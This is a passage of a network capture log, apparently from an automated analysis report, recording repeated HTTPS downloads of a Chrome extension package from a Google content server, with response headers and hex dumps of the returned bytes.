sRGBgAMAa#IDATxSOTA_;0V6XXH4BbciR#XibFHT3] @K6fo!Wr\ l?pfv_NT{NL9@))"ipq_.g}$c< $z`210ccAXY(q^Ww'+jcn
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 7e 7a db 6f fc 6e 94 b7 89 5f ea ce 03 8d d6 f1 29 f1 7a d0 e6 91 c5 22 9b 1f 15 15 99 82 04 8c dc d4 75 a1 44 7a a4 8a 07 0a 82 62 c6 2c 7c 12 5b 10 8b 91 9b b8 4b 91 68 8b c1 ae ca 8c d5 ff 91 f1 c6 16 08 e6 1a f5 0b cf 4b aa b8 7c cd fa fe 5b 9f be ef 4d 15 b0 f8 ee f1 d1 62 f6 be 3a 64 33 77 53 ec f1 67 31 03 be a1 29 d9 6e a8 be 48 e2 0f b2 2b 58 e3 43 41 71 f2 71 d0 9e 3b 11 7b b6 ed 1e f6 02 a4 1c 52 e2 d3 a8 18 55 96 e3 53 f3 75 62 b1 62 25 d9 5c 37 2c b8 75 f7 46 88 5b d5 bd fb d9 15 b3 d0 ff 64 36 e5 15 58 f6 35 31 ea 62 f4 db 68 4a 50 dd 43 3b b0 17 f0 d4 52 dd 25 44 03 84 01 3b 40 00 0f ec bc 82 17 56 b0 4c ae 67 0b 29 be 06 be 2f 56 93 b0 1d 17 2b 01 c1 07 73 89 24 83 cb 72 52 dd b0 e3 6f a4 33 ef 83 ed 1f 9f aa 16 90 60 60 7d 9e 67 88 41 24 Data Ascii: ~zon_)z"uDzb,\|[KhK\|[Mb:d3wSg1)nH+XCAqq;{RUSubb%\7,uF[d6X51bhJPC;R%D;@VLg)/V+s$rRo3``}gA$
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 1f 7a 34 d3 84 8c 5a 05 98 c6 3d 44 44 0f 09 85 69 90 27 21 c5 89 b7 82 80 a9 cc c6 ca df cf b2 51 6f 8d 41 3e a3 d4 00 48 48 90 16 5e 3b 4e 78 98 75 6b 25 05 bc 7c 27 97 04 9e 20 ad 08 fb 8d 67 5e 86 c7 f7 fd 00 c6 5f 3a 41 53 af 9f 31 0d 5f 7b e5 45 f4 e9 95 17 e3 ba 5f cd 84 e9 c2 41 78 57 9a 11 40 7e 7e e8 96 0d 66 06 ed ba 04 41 a7 5d 62 72 e0 88 c4 c7 d3 59 42 f5 fe af 3e 79 10 b6 3c fe 3f 70 ec f5 99 3a a2 3b d8 e0 8a 8b 17 55 cb 29 8a 18 7b e1 28 8e 7d ef 08 fc e1 3f be 40 5f 5c 3b 84 9b 6e ba a2 12 95 f9 6c 88 a8 29 a3 17 75 62 e1 04 cc b2 8d e3 74 b4 62 e2 42 b2 2b 28 f8 8b 72 40 77 bf 28 66 cb bf 1c c0 c9 43 27 72 df 6c e6 e2 97 e2 67 57 bd 17 ae bd 62 59 6b 31 e3 2f bd 06 7f bd 73 02 be f1 ef af e4 e3 24 3d f6 9d 1f c0 8e 2f fd 3a 0e 5d 34 7f Data Ascii: z4Z=DDi'!QoA>HH^;Nxuk%\|' g^_:AS1_{E_AxW@~~fA]brYB>y<?p:;U){(}?@_\;nl)ubtbB+(r@w(fC'rlgWbYk1/s$=/:]4
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 64 76 c5 3d 8e 9f 9a 6d 09 dd 7b 7e ed 96 6f c3 f8 e4 6b e5 c9 12 ed fc d3 0f e3 d0 c5 67 27 3b bc fe f6 dd b0 eb bb c7 99 83 20 ce 79 47 10 5c e8 56 5f e3 a0 00 fa 12 a3 60 48 0a 7e 23 b1 13 fa f2 e4 7d 35 a9 f9 c4 3d ff 91 09 ce 2b ad 45 94 fc a0 57 f8 5d 99 ff ef 9f fc a1 9d df b9 e9 43 30 bc fc 82 6c 01 af e3 f5 9b 77 67 6b 38 09 3f 4d 2b 6c f3 f3 5b bf 43 bb 9e 7b b5 40 1a 05 3a df 7e ad 81 5c 03 91 0c e1 e0 86 bd 14 43 06 a8 1b 44 a4 d0 19 0a d7 cf 3c 1f 8a 25 cc ce 54 25 0d e5 22 c8 1d 37 fd 22 8c 64 50 1b 16 64 2f 24 67 ec 7b 47 e1 a1 5d 2f c3 d8 f3 47 4a b1 04 76 de b9 1a 86 87 f8 81 4a b5 84 3f df 03 fb bf 7f 2c 67 8b 0b e0 89 bb d6 40 99 e7 27 69 93 d9 e4 1f 7d e6 15 78 e0 d1 ff a3 c9 43 a7 32 ee 75 84 85 16 ae 82 10 37 4e 05 ae 9f 4b 64 aa 2f Data Ascii: dv=m{~okg'; yG\V_`H~#}5=+EW]C0lwgk8?M+l[C{@:~\CD<%T%"7"dPd/$g{G]/GJvJ?,g@'i}xC2u7NKd/
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 9b 62 ef e2 65 81 1e 8f b8 04 d5 0e 41 51 40 bd 9e bc 5f 3b c3 d8 76 5c ef f9 05 49 6b 1e bd 20 be a3 dc 56 66 bc 47 ab 2c 86 f0 10 7c f3 86 d1 28 6f 03 3d ed f4 df 5d 3b 9a 15 bc 95 85 c4 e8 b7 58 5f 3e e4 89 51 7d 93 e2 c3 d5 96 40 f5 8e 2d bf 06 9a bb 2e 13 48 0e cc 00 50 f0 c1 66 04 c7 31 bb 06 dd 32 08 1c 7b 6c db 29 4e 9d 97 f2 40 af f0 6f aa 80 d2 ce fc fd 9a db 1a 48 9f cb fe 7d 40 95 0f 4c e9 62 45 c5 76 cc 6c 9c fc dd a1 2a 08 b9 8b f0 0c bc 32 a4 c8 d3 35 50 c8 a2 83 76 10 01 e7 58 54 b8 96 b1 45 23 96 e2 94 3e fb d4 c9 e1 58 fe bb 0d be f9 a9 8d 6f 26 2b c2 db b4 85 a3 4f ae 98 81 ce fa 1c a8 46 f3 c4 43 4a 7f 79 41 a6 71 f4 bc 41 cd cd 42 53 b0 dd 36 25 b5 4d 4f 3e 21 d8 3b 08 82 23 e0 96 d6 8b f6 e6 eb c1 25 75 53 04 a3 a6 32 f7 7e 00 66 4e Data Ascii: beAQ@_;v\Ik VfG,\|(o=];X_>Q}@-.HPf12{l)N@oH}@LbEvl*25PvXTE#>Xo&+OFCJyAqABS6%MO>!;#%uS2~fN
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: a8 df 0a 3d 79 8a 2a 5c c3 ed f0 6f ef de 96 a2 6f c5 79 52 6c 47 73 7c a0 ad 1c 5b 25 91 4e 76 43 8b d8 29 9e dd 1a 8e 90 49 3d d2 c3 94 8d 85 c9 e0 5f 8f 25 39 84 b4 53 d2 28 c5 01 1b 8a 2c 1a a2 bc 63 92 df d2 67 52 be 9c ca aa 44 8b f7 64 92 70 34 93 fe 4d 0c 8c 18 4f 45 30 a1 c4 28 4a e4 93 87 23 af 5a f4 ef bf f2 16 ec 64 db 29 04 d8 fb 4f 6e fe d3 41 0c ef c6 28 b4 05 b8 f9 9b da 2f 99 74 15 8b 41 e6 79 f6 1a 30 50 57 cf ac b1 30 62 6f eb ad 4a da 54 71 8e 1c a2 51 8e e3 83 a9 cb 24 cd 81 25 4b 48 8a 42 c0 6a 4b f8 90 1c 9f 9a f0 63 53 4c b0 5e df 70 d8 56 00 79 8c 50 c4 6e 30 1c c6 a7 7d 8c c9 ad 67 12 19 89 02 47 47 0e 70 c1 96 bf 38 e2 3d d8 c1 b6 43 06 50 d9 fd 1e 8b ae 1a c6 71 68 88 51 3b 30 d8 47 40 5d 04 53 61 ea 08 07 0c af f0 f8 9f a0 1f Data Ascii: =y*\ooyRlGs\|[%NvC)I=_%9S(,cgRDdp4MOE0(J#Zd)OnA(/tAy0PW0boJTqQ$%KHBjKcSL^pVyPn0}gGGp8=CPqhQ;0G@]Sa
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 03 d0 5e 5f df 6b d6 29 52 d6 40 6d 69 96 72 d0 47 a0 a2 8f 2b c9 2b 52 b1 6c 30 79 fe 0c 2b 5c 89 b8 72 8e 9f e7 16 c4 da 5e b7 b0 df 84 0a 45 b8 40 2f f8 9c c2 90 cb f9 f3 1d 1f bd ed af 5f b5 d6 8e 69 11 60 86 2f 68 7a 10 01 e8 af 5a a0 15 6b ce 62 d7 f4 ae af 46 57 cd c2 87 9c d2 3a 1d 1f f1 34 24 75 62 59 df 88 b2 aa 5f dd 7a 4e 30 19 a6 0e 21 3f 68 eb 00 6e 11 7d 1a 53 40 50 73 6d 0d 61 14 97 d3 3e 15 4e 14 05 1c 70 0c 66 64 8c 4a c4 7a f5 77 5f e1 53 04 48 e1 d2 39 09 9b a1 65 b4 91 50 c9 9a 35 a4 28 e9 07 c5 5c 27 b8 45 c0 b5 1f 6b c7 71 e6 8d a0 f9 61 f1 2e 35 37 80 b2 a4 3b e4 a6 2b 03 5d d0 c2 70 26 7c be 0e 51 3d 54 ec 1e 9a c7 bb b2 cc 20 03 9b ac 0f ab e8 69 7f 94 c3 0a 94 5c 99 72 95 e8 b9 1f 53 f6 70 57 9c fc 64 98 b4 fe fc f8 0c f9 1e 1f Data Ascii: ^_k)R@mirG++Rl0y+\r^E@/_i`/hzZkbFW:4$ubY_zN0!?hn}S@Psma>NpfdJzw_SH9eP5(\'Ekqa.57;+]p&\|Q=T i\rSpWd
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 1c 6e 1e 51 bd 2d 2f 70 8c 95 c0 95 17 e9 39 1c 52 61 4a c7 89 61 bb 41 53 26 1b ed 98 b4 d3 40 19 85 07 58 f4 e4 64 f4 cd b1 4d 9a ac d7 a7 64 34 06 b7 aa 7c 4f 03 5d 76 93 95 b7 3c a2 0e ab bb e1 c4 e5 31 27 00 3e 29 64 6f 17 22 94 bc da 0d b0 d7 51 f6 a3 22 05 1b 9c aa 17 02 89 f4 64 36 19 9c c1 38 5d c0 98 c2 5f e3 11 26 80 71 71 c5 85 0a 32 e5 64 27 b5 4e 9b 35 07 3b 37 90 c5 26 20 b9 b3 5e 33 41 6c 8c d5 44 a1 63 19 2b 2f 19 93 57 23 39 7d 8e 98 3a 52 46 e0 fa 54 c3 64 0b 2f ca 19 8c 24 ba bc 5c d6 ca 11 aa 33 f5 29 cb 42 9e 87 1b 8c d8 0e 1f da 51 59 f8 21 0f 34 49 2e 0c ce 1c c7 70 91 b9 71 9d 20 30 d6 83 28 2e e2 bb cc 93 39 18 8a 2f cf 8b fd 27 57 e9 47 48 80 80 3e 19 bd 16 71 10 c6 c6 46 2c 4d a4 11 72 42 27 61 50 3a 0e e7 0e 01 cd ea 50 1e 3a Data Ascii: nQ-/p9RaJaAS&@XdMd4\|O]v<1'>)do"Q"d68]_&qq2d'N5;7& ^3AlDc+/W#9}:RFTd/$\3)BQY!4I.pq 0(.9/'WGH>qF,MrB'aP:P:

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	49775	142.250.64.193	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:35 UTC	310	OUT	GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1 Connection: Keep-Alive Cache-Control: no-cache Host: clients2.googleusercontent.com
2024-04-26 15:12:36 UTC	565	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPpQX5vFdS6pAXqPQuz85UPOTBUXtRfuR8W1ezHqH6ofOvPeLWbkM435fTRT2wR8XuvP88s Accept-Ranges: bytes Content-Length: 26186 X-Goog-Hash: crc32c=i5zIOg== Server: UploadServer Date: Thu, 25 Apr 2024 17:23:13 GMT Expires: Fri, 25 Apr 2025 17:23:13 GMT Cache-Control: public, max-age=31536000 Age: 78563 Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:12:36 UTC	690	IN	Data Raw: 43 72 32 34 03 00 00 00 1c 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 8f fb bf 5c 37 63 94 3c b0 ee 01 c4 b5 a6 9a b1 9f 46 74 6f 16 38 a0 32 27 35 dd f0 71 6b 0e dc f6 25 cb b2 ed ea fb 32 d5 af 1e 03 43 03 46 f0 a7 39 db 23 96 1d 65 e5 78 51 f0 84 b0 0e 12 ac 0e 5b dc c9 d6 4c 7c 00 d5 b8 1b 88 33 3e 2f da eb aa f7 1a 75 c2 ae 3a 54 de 37 8f 10 d2 28 e6 84 79 4d 15 b4 f3 bd 3f 56 d3 3c 3f 18 ab fc 2e 05 c0 1e 08 31 b6 61 d0 fd 9f 4f 3f 64 0d 17 93 bc ad 41 c7 48 be 00 27 a8 4d 70 42 92 05 54 a6 6d b8 de 56 6e 20 49 70 ee 10 3e 6b d2 7c 31 bd 1b 6e a4 3c 46 62 9f 08 66 93 f9 2a 51 31 a8 db b5 9d b9 0f 73 e8 a0 09 32 01 e9 7b 2a 8a 36 a0 cf 17 b0 50 70 9d a2 f9 a4 6f 62 4d Data Ascii: Cr240"0H0\7c<Fto82'5qk%2CF9#exQ[L\|3>/u:T7(yM?V<?.1aO?dAH'MpBTmVn Ip>k\|1n<FbfQ1s2{*6PpobM
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 6d 46 aa bb 68 49 1d 72 6b 3e 29 26 77 db e5 af d5 14 09 ba 8a 5b fb 7c 5f 12 62 f5 5e 36 d7 e6 ef c4 89 45 2d 24 dc 50 d8 b5 1e 8b c9 bb bf dd 3f 45 78 2c 66 ee 3b 59 18 a6 75 f1 67 4e b2 a4 34 0e 97 56 9f a4 02 20 b0 3e 92 a7 35 32 ba ca 4a 5c 5e ee 59 2b 23 74 9e 92 c4 35 58 43 d9 0f 5e 35 db 94 e5 10 84 b0 c1 79 4a 94 d9 ad 99 86 73 48 5c 61 ea d2 d6 41 1d c9 a1 1f 57 d2 88 75 b2 f6 77 b6 cf 97 5c 22 59 e9 3c c2 a5 af e3 78 a6 f5 c6 f2 f6 0f ab fb 3d ae fa b8 77 8c e3 f7 88 ee a0 35 fa 5c a8 0c b0 1c 03 b2 29 72 46 6d 02 03 01 00 01 12 80 02 31 7c ed 26 5f 9e 5d 85 0e f4 74 8c 35 13 26 b2 45 6f 71 73 d3 d8 af 7c 00 e2 30 52 c3 74 c0 3e ac 8f a3 85 97 a8 f7 28 2a e9 75 16 06 af cd 7c e9 46 71 a1 ef dd 02 3f 7a 17 c6 e3 06 0a 0d 18 d3 80 d7 18 ad cd 4c Data Ascii: mFhIrk>)&w[\|_b^6E-$P?Ex,f;YugN4V >52J\^Y+#t5XC^5yJsH\aAWuw\"Y<x=w5\)rFm1\|&_]t5&Eoqs\|0Rt>(*u\|Fq?zL
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 02 23 49 44 41 54 78 01 8d 53 bf 4f 54 41 10 fe e6 b8 5f e2 c5 13 e9 d4 3b 89 85 b1 f3 0f 30 e4 9e 56 36 da 58 58 d9 9b 48 fc 07 34 11 42 62 63 69 a3 a5 52 f8 07 d8 19 23 ef 90 84 58 69 62 a1 46 0b 48 54 82 14 dc 11 0e c8 dd ee 0e 33 b3 ef 5d 20 40 c2 4b 36 bb fb 66 e7 9b 6f be 99 21 c8 57 9b fd 96 d0 08 9e 72 e0 16 5c 20 d9 a1 0b 1e 8c 20 f7 6c 87 fe f7 f2 3f 70 0a ef 66 76 5f 4e a6 54 7b f6 bd 05 b8 f9 a1 d1 1e e4 4e 4c f0 01 39 00 87 83 40 9e 29 29 22 b8 69 70 1e 71 5f 14 b1 9a a3 1c c5 2e 67 7d 24 bb 63 e6 0c 84 3c a6 05 20 24 7a 89 8e 60 0a c8 a2 ab a3 32 31 30 63 63 41 58 59 19 b0 82 28 83 dc 99 71 a9 5e a2 57 77 27 d0 1c 2b 91 6a 63 d1 e3 6e f7 ee Data Ascii: sRGBgAMAa#IDATxSOTA_;0V6XXH4BbciR#XibFHT3] @K6fo!Wr\ l?pfv_NT{NL9@))"ipq_.g}$c< $z`210ccAXY(q^Ww'+jcn
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 7e 7a db 6f fc 6e 94 b7 89 5f ea ce 03 8d d6 f1 29 f1 7a d0 e6 91 c5 22 9b 1f 15 15 99 82 04 8c dc d4 75 a1 44 7a a4 8a 07 0a 82 62 c6 2c 7c 12 5b 10 8b 91 9b b8 4b 91 68 8b c1 ae ca 8c d5 ff 91 f1 c6 16 08 e6 1a f5 0b cf 4b aa b8 7c cd fa fe 5b 9f be ef 4d 15 b0 f8 ee f1 d1 62 f6 be 3a 64 33 77 53 ec f1 67 31 03 be a1 29 d9 6e a8 be 48 e2 0f b2 2b 58 e3 43 41 71 f2 71 d0 9e 3b 11 7b b6 ed 1e f6 02 a4 1c 52 e2 d3 a8 18 55 96 e3 53 f3 75 62 b1 62 25 d9 5c 37 2c b8 75 f7 46 88 5b d5 bd fb d9 15 b3 d0 ff 64 36 e5 15 58 f6 35 31 ea 62 f4 db 68 4a 50 dd 43 3b b0 17 f0 d4 52 dd 25 44 03 84 01 3b 40 00 0f ec bc 82 17 56 b0 4c ae 67 0b 29 be 06 be 2f 56 93 b0 1d 17 2b 01 c1 07 73 89 24 83 cb 72 52 dd b0 e3 6f a4 33 ef 83 ed 1f 9f aa 16 90 60 60 7d 9e 67 88 41 24 Data Ascii: ~zon_)z"uDzb,\|[KhK\|[Mb:d3wSg1)nH+XCAqq;{RUSubb%\7,uF[d6X51bhJPC;R%D;@VLg)/V+s$rRo3``}gA$
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 1f 7a 34 d3 84 8c 5a 05 98 c6 3d 44 44 0f 09 85 69 90 27 21 c5 89 b7 82 80 a9 cc c6 ca df cf b2 51 6f 8d 41 3e a3 d4 00 48 48 90 16 5e 3b 4e 78 98 75 6b 25 05 bc 7c 27 97 04 9e 20 ad 08 fb 8d 67 5e 86 c7 f7 fd 00 c6 5f 3a 41 53 af 9f 31 0d 5f 7b e5 45 f4 e9 95 17 e3 ba 5f cd 84 e9 c2 41 78 57 9a 11 40 7e 7e e8 96 0d 66 06 ed ba 04 41 a7 5d 62 72 e0 88 c4 c7 d3 59 42 f5 fe af 3e 79 10 b6 3c fe 3f 70 ec f5 99 3a a2 3b d8 e0 8a 8b 17 55 cb 29 8a 18 7b e1 28 8e 7d ef 08 fc e1 3f be 40 5f 5c 3b 84 9b 6e ba a2 12 95 f9 6c 88 a8 29 a3 17 75 62 e1 04 cc b2 8d e3 74 b4 62 e2 42 b2 2b 28 f8 8b 72 40 77 bf 28 66 cb bf 1c c0 c9 43 27 72 df 6c e6 e2 97 e2 67 57 bd 17 ae bd 62 59 6b 31 e3 2f bd 06 7f bd 73 02 be f1 ef af e4 e3 24 3d f6 9d 1f c0 8e 2f fd 3a 0e 5d 34 7f Data Ascii: z4Z=DDi'!QoA>HH^;Nxuk%\|' g^_:AS1_{E_AxW@~~fA]brYB>y<?p:;U){(}?@_\;nl)ubtbB+(r@w(fC'rlgWbYk1/s$=/:]4
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 64 76 c5 3d 8e 9f 9a 6d 09 dd 7b 7e ed 96 6f c3 f8 e4 6b e5 c9 12 ed fc d3 0f e3 d0 c5 67 27 3b bc fe f6 dd b0 eb bb c7 99 83 20 ce 79 47 10 5c e8 56 5f e3 a0 00 fa 12 a3 60 48 0a 7e 23 b1 13 fa f2 e4 7d 35 a9 f9 c4 3d ff 91 09 ce 2b ad 45 94 fc a0 57 f8 5d 99 ff ef 9f fc a1 9d df b9 e9 43 30 bc fc 82 6c 01 af e3 f5 9b 77 67 6b 38 09 3f 4d 2b 6c f3 f3 5b bf 43 bb 9e 7b b5 40 1a 05 3a df 7e ad 81 5c 03 91 0c e1 e0 86 bd 14 43 06 a8 1b 44 a4 d0 19 0a d7 cf 3c 1f 8a 25 cc ce 54 25 0d e5 22 c8 1d 37 fd 22 8c 64 50 1b 16 64 2f 24 67 ec 7b 47 e1 a1 5d 2f c3 d8 f3 47 4a b1 04 76 de b9 1a 86 87 f8 81 4a b5 84 3f df 03 fb bf 7f 2c 67 8b 0b e0 89 bb d6 40 99 e7 27 69 93 d9 e4 1f 7d e6 15 78 e0 d1 ff a3 c9 43 a7 32 ee 75 84 85 16 ae 82 10 37 4e 05 ae 9f 4b 64 aa 2f Data Ascii: dv=m{~okg'; yG\V_`H~#}5=+EW]C0lwgk8?M+l[C{@:~\CD<%T%"7"dPd/$g{G]/GJvJ?,g@'i}xC2u7NKd/
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 9b 62 ef e2 65 81 1e 8f b8 04 d5 0e 41 51 40 bd 9e bc 5f 3b c3 d8 76 5c ef f9 05 49 6b 1e bd 20 be a3 dc 56 66 bc 47 ab 2c 86 f0 10 7c f3 86 d1 28 6f 03 3d ed f4 df 5d 3b 9a 15 bc 95 85 c4 e8 b7 58 5f 3e e4 89 51 7d 93 e2 c3 d5 96 40 f5 8e 2d bf 06 9a bb 2e 13 48 0e cc 00 50 f0 c1 66 04 c7 31 bb 06 dd 32 08 1c 7b 6c db 29 4e 9d 97 f2 40 af f0 6f aa 80 d2 ce fc fd 9a db 1a 48 9f cb fe 7d 40 95 0f 4c e9 62 45 c5 76 cc 6c 9c fc dd a1 2a 08 b9 8b f0 0c bc 32 a4 c8 d3 35 50 c8 a2 83 76 10 01 e7 58 54 b8 96 b1 45 23 96 e2 94 3e fb d4 c9 e1 58 fe bb 0d be f9 a9 8d 6f 26 2b c2 db b4 85 a3 4f ae 98 81 ce fa 1c a8 46 f3 c4 43 4a 7f 79 41 a6 71 f4 bc 41 cd cd 42 53 b0 dd 36 25 b5 4d 4f 3e 21 d8 3b 08 82 23 e0 96 d6 8b f6 e6 eb c1 25 75 53 04 a3 a6 32 f7 7e 00 66 4e Data Ascii: beAQ@_;v\Ik VfG,\|(o=];X_>Q}@-.HPf12{l)N@oH}@LbEvl*25PvXTE#>Xo&+OFCJyAqABS6%MO>!;#%uS2~fN
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: a8 df 0a 3d 79 8a 2a 5c c3 ed f0 6f ef de 96 a2 6f c5 79 52 6c 47 73 7c a0 ad 1c 5b 25 91 4e 76 43 8b d8 29 9e dd 1a 8e 90 49 3d d2 c3 94 8d 85 c9 e0 5f 8f 25 39 84 b4 53 d2 28 c5 01 1b 8a 2c 1a a2 bc 63 92 df d2 67 52 be 9c ca aa 44 8b f7 64 92 70 34 93 fe 4d 0c 8c 18 4f 45 30 a1 c4 28 4a e4 93 87 23 af 5a f4 ef bf f2 16 ec 64 db 29 04 d8 fb 4f 6e fe d3 41 0c ef c6 28 b4 05 b8 f9 9b da 2f 99 74 15 8b 41 e6 79 f6 1a 30 50 57 cf ac b1 30 62 6f eb ad 4a da 54 71 8e 1c a2 51 8e e3 83 a9 cb 24 cd 81 25 4b 48 8a 42 c0 6a 4b f8 90 1c 9f 9a f0 63 53 4c b0 5e df 70 d8 56 00 79 8c 50 c4 6e 30 1c c6 a7 7d 8c c9 ad 67 12 19 89 02 47 47 0e 70 c1 96 bf 38 e2 3d d8 c1 b6 43 06 50 d9 fd 1e 8b ae 1a c6 71 68 88 51 3b 30 d8 47 40 5d 04 53 61 ea 08 07 0c af f0 f8 9f a0 1f Data Ascii: =y*\ooyRlGs\|[%NvC)I=_%9S(,cgRDdp4MOE0(J#Zd)OnA(/tAy0PW0boJTqQ$%KHBjKcSL^pVyPn0}gGGp8=CPqhQ;0G@]Sa
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 03 d0 5e 5f df 6b d6 29 52 d6 40 6d 69 96 72 d0 47 a0 a2 8f 2b c9 2b 52 b1 6c 30 79 fe 0c 2b 5c 89 b8 72 8e 9f e7 16 c4 da 5e b7 b0 df 84 0a 45 b8 40 2f f8 9c c2 90 cb f9 f3 1d 1f bd ed af 5f b5 d6 8e 69 11 60 86 2f 68 7a 10 01 e8 af 5a a0 15 6b ce 62 d7 f4 ae af 46 57 cd c2 87 9c d2 3a 1d 1f f1 34 24 75 62 59 df 88 b2 aa 5f dd 7a 4e 30 19 a6 0e 21 3f 68 eb 00 6e 11 7d 1a 53 40 50 73 6d 0d 61 14 97 d3 3e 15 4e 14 05 1c 70 0c 66 64 8c 4a c4 7a f5 77 5f e1 53 04 48 e1 d2 39 09 9b a1 65 b4 91 50 c9 9a 35 a4 28 e9 07 c5 5c 27 b8 45 c0 b5 1f 6b c7 71 e6 8d a0 f9 61 f1 2e 35 37 80 b2 a4 3b e4 a6 2b 03 5d d0 c2 70 26 7c be 0e 51 3d 54 ec 1e 9a c7 bb b2 cc 20 03 9b ac 0f ab e8 69 7f 94 c3 0a 94 5c 99 72 95 e8 b9 1f 53 f6 70 57 9c fc 64 98 b4 fe fc f8 0c f9 1e 1f Data Ascii: ^_k)R@mirG++Rl0y+\r^E@/_i`/hzZkbFW:4$ubY_zN0!?hn}S@Psma>NpfdJzw_SH9eP5(\'Ekqa.57;+]p&\|Q=T i\rSpWd
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 1c 6e 1e 51 bd 2d 2f 70 8c 95 c0 95 17 e9 39 1c 52 61 4a c7 89 61 bb 41 53 26 1b ed 98 b4 d3 40 19 85 07 58 f4 e4 64 f4 cd b1 4d 9a ac d7 a7 64 34 06 b7 aa 7c 4f 03 5d 76 93 95 b7 3c a2 0e ab bb e1 c4 e5 31 27 00 3e 29 64 6f 17 22 94 bc da 0d b0 d7 51 f6 a3 22 05 1b 9c aa 17 02 89 f4 64 36 19 9c c1 38 5d c0 98 c2 5f e3 11 26 80 71 71 c5 85 0a 32 e5 64 27 b5 4e 9b 35 07 3b 37 90 c5 26 20 b9 b3 5e 33 41 6c 8c d5 44 a1 63 19 2b 2f 19 93 57 23 39 7d 8e 98 3a 52 46 e0 fa 54 c3 64 0b 2f ca 19 8c 24 ba bc 5c d6 ca 11 aa 33 f5 29 cb 42 9e 87 1b 8c d8 0e 1f da 51 59 f8 21 0f 34 49 2e 0c ce 1c c7 70 91 b9 71 9d 20 30 d6 83 28 2e e2 bb cc 93 39 18 8a 2f cf 8b fd 27 57 e9 47 48 80 80 3e 19 bd 16 71 10 c6 c6 46 2c 4d a4 11 72 42 27 61 50 3a 0e e7 0e 01 cd ea 50 1e 3a Data Ascii: nQ-/p9RaJaAS&@XdMd4\|O]v<1'>)do"Q"d68]_&qq2d'N5;7& ^3AlDc+/W#9}:RFTd/$\3)BQY!4I.pq 0(.9/'WGH>qF,MrB'aP:P:

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49778	142.250.64.193	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:38 UTC	310	OUT	GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1 Connection: Keep-Alive Cache-Control: no-cache Host: clients2.googleusercontent.com
2024-04-26 15:12:38 UTC	565	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPpQX5vFdS6pAXqPQuz85UPOTBUXtRfuR8W1ezHqH6ofOvPeLWbkM435fTRT2wR8XuvP88s Accept-Ranges: bytes Content-Length: 26186 X-Goog-Hash: crc32c=i5zIOg== Server: UploadServer Date: Thu, 25 Apr 2024 17:23:13 GMT Expires: Fri, 25 Apr 2025 17:23:13 GMT Cache-Control: public, max-age=31536000 Age: 78565 Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:12:38 UTC	690	IN	Data Raw: 43 72 32 34 03 00 00 00 1c 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 8f fb bf 5c 37 63 94 3c b0 ee 01 c4 b5 a6 9a b1 9f 46 74 6f 16 38 a0 32 27 35 dd f0 71 6b 0e dc f6 25 cb b2 ed ea fb 32 d5 af 1e 03 43 03 46 f0 a7 39 db 23 96 1d 65 e5 78 51 f0 84 b0 0e 12 ac 0e 5b dc c9 d6 4c 7c 00 d5 b8 1b 88 33 3e 2f da eb aa f7 1a 75 c2 ae 3a 54 de 37 8f 10 d2 28 e6 84 79 4d 15 b4 f3 bd 3f 56 d3 3c 3f 18 ab fc 2e 05 c0 1e 08 31 b6 61 d0 fd 9f 4f 3f 64 0d 17 93 bc ad 41 c7 48 be 00 27 a8 4d 70 42 92 05 54 a6 6d b8 de 56 6e 20 49 70 ee 10 3e 6b d2 7c 31 bd 1b 6e a4 3c 46 62 9f 08 66 93 f9 2a 51 31 a8 db b5 9d b9 0f 73 e8 a0 09 32 01 e9 7b 2a 8a 36 a0 cf 17 b0 50 70 9d a2 f9 a4 6f 62 4d Data Ascii: 